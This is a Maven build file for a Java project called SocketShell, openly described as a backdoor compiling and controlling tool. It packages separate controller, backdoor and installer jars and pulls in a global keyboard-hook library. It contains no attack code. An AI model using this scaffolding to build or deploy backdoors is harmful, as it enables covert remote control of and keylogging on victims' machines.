<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
	<modelVersion>4.0.0</modelVersion>
	<parent>
		<groupId>org.springframework.boot</groupId>
		<artifactId>spring-boot-starter-parent</artifactId>
		<version>2.1.8.RELEASE</version>
		<relativePath/>
	</parent>
	<groupId>com.github.thatcherdev</groupId>
	<artifactId>SocketShell</artifactId>
	<version>0.0.1-SNAPSHOT</version>
	<name>SocketShell</name>
	<description>A backdoor compiling and controlling tool.</description>

	<properties>
		<java.version>1.8</java.version>
	</properties>

	<dependencies>
		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter</artifactId>
		</dependency>

		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter-test</artifactId>
			<scope>test</scope>
		</dependency>

		<dependency>
			<groupId>com.github.vatbub</groupId>
			<artifactId>mslinks</artifactId>
			<version>1.0.3.1</version>
		</dependency>

		<dependency>
			<groupId>commons-io</groupId>
			<artifactId>commons-io</artifactId>
			<version>2.5</version>
		</dependency>

		<dependency>
			<groupId>com.1stleg</groupId>
			<artifactId>jnativehook</artifactId>
			<version>2.0.2</version>
		</dependency>
	</dependencies>

	<build>
		<plugins>
			<plugin>
				<groupId>org.springframework.boot</groupId>
				<artifactId>spring-boot-maven-plugin</artifactId>
				<executions>
					<execution>
						<id>socketshell</id>
						<phase>package</phase>
						<configuration>
							<finalName>socketshell</finalName>
							<mainClass>com.github.thatcherdev.socketshell.SocketShell</mainClass>
							<outputDirectory>${project.basedir}</outputDirectory>
						</configuration>
						<goals>
							<goal>repackage</goal>
						</goals>
					</execution>

					<execution>
						<id>backdoor</id>
						<phase>package</phase>
						<configuration>
							<finalName>run</finalName>
							<mainClass>com.github.thatcherdev.socketshell.backdoor.Backdoor</mainClass>
						</configuration>
						<goals>
							<goal>repackage</goal>
						</goals>
					</execution>

					<execution>
						<id>install</id>
						<phase>package</phase>
						<configuration>
							<finalName>install</finalName>
							<mainClass>com.github.thatcherdev.socketshell.install.Install</mainClass>
						</configuration>
						<goals>
							<goal>repackage</goal>
						</goals>
					</execution>
				 </executions>
			</plugin>
		</plugins>
	</build>

</project>
